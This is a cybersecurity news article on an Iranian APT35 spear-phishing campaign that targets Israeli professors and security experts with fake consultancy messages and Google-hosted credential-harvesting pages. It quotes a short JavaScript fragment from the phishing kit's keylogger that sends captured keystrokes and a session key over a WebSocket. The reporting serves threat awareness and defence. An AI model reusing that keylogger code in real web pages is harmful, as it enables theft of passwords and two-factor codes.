Cyber Security News

Iranian APT35 Hackers Attacking High-Profile Cyber Security Experts & Professors from Israel

A sophisticated spear-phishing campaign targeting Israeli cybersecurity experts and computer science professors has emerged amid escalating tensions between Iran and Israel.

The Iranian threat group Educated Manticore, widely associated with the Islamic Revolutionary Guard Corps’ Intelligence Organization, has launched precision attacks against leading academics from Israeli universities and high-profile cybersecurity professionals since mid-June 2025.

The attackers employ deceptive social engineering tactics, impersonating fictitious employees of prominent cybersecurity companies through carefully crafted emails and WhatsApp messages.

Initial email impersonating a fictitious Threat Intelligence Analyst (Source – Check Point)

These communications request consultations on enhancing cybersecurity for energy companies, leveraging the current geopolitical climate to create urgency and legitimacy.

The threat actors demonstrate remarkable sophistication in their approach, utilizing AI-assisted content generation to produce formal, error-free communications that initially appear genuine to potential victims.

Check Point researchers identified that the campaign represents a significant evolution in Educated Manticore’s operational capabilities, marking a new phase where the group specifically targets the credibility of cybersecurity organizations to gain victim trust.

Link to the phishing page sent via WhatsApp to one of the targets (Source – Check Point)

The attackers guide engaged targets toward fake Google Meet invitations or credential harvesting pages, designed to intercept both passwords and two-factor authentication codes through advanced phishing infrastructure.

Fake image redirecting to the attackers’ servers (Source – Check Point)

The campaign utilizes multi-stage phishing pages hosted on Google Sites service, adding legitimacy through the trusted Google domain.

Once victims interact with these pages, they encounter a sophisticated React-based Single Page Application designed to closely mimic legitimate Google authentication flows.

Advanced Phishing Infrastructure

The technical foundation of this campaign centers on a custom-built phishing kit implemented as a React-based Single Page Application.

The malicious infrastructure demonstrates remarkable technical sophistication, utilizing dynamic UI rendering and real-time data exfiltration capabilities that distinguish it from conventional phishing operations.

The phishing kit maintains persistent WebSocket connections on the /sessions endpoint, establishing continuous communication channels with command-and-control servers.

This architecture enables real-time credential harvesting through an integrated passive keylogger that captures every keystroke, transmitting data even when users abandon forms without submission:-

n && !t && n.send(JSON.stringify({
d: "kl",
c: a.which in 1s ? ls [a.which] : a.key,
sk: localStorage.getItem("sk"),
page: e
}))

The infrastructure spans over 130 unique domains resolving to multiple IP addresses, primarily registered through NameCheap.

This extensive network enables rapid infrastructure rotation when domains are identified and taken down, ensuring campaign continuity despite increased security scrutiny.

Investigate live malware behavior, trace every step of an attack, and make faster, smarter security decisions -> Try ANY.RUN now

Tushar Subhra Dutta

Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.

Recent Posts

Microsoft Releases Emergency Windows 11 Update Following Patch Tuesday Bugs

Microsoft has pushed out an emergency, out-of-band Windows 11 update after its September Patch Tuesday…

7 minutes ago

Top 10 Best Cloud Detection & Response (CDR) Solutions in 2026

CDR is the runtime, real-time half of cloud security: while CSPM tells you what’s misconfigured,…

11 minutes ago

Top 10 Best SaaS Security Posture Management (SSPM) Tools in 2026

Your SaaS estate M365, Salesforce, Workday, Slack, hundreds of others is a sprawl of misconfigurations,…

17 minutes ago

Top 10 Best Data Security Posture Management (DSPM) Tools in 2026

DSPM finds sensitive data you didn’t know you had, classifies it, maps who can reach…

23 minutes ago

OpenAI Agent Swarm Linked to 3,022 Malicious RubyGems Packages in GemStuffer Campaign

Open-source packages are meant to save developers time. In the GemStuffer campaign, that trust became…

33 minutes ago

Google Chrome 153 Update Fixes 42 Security Flaws, Including 3 Critical Ones

Google has released an important Chrome 153 security update that fixes 42 vulnerabilities across the…

5 hours ago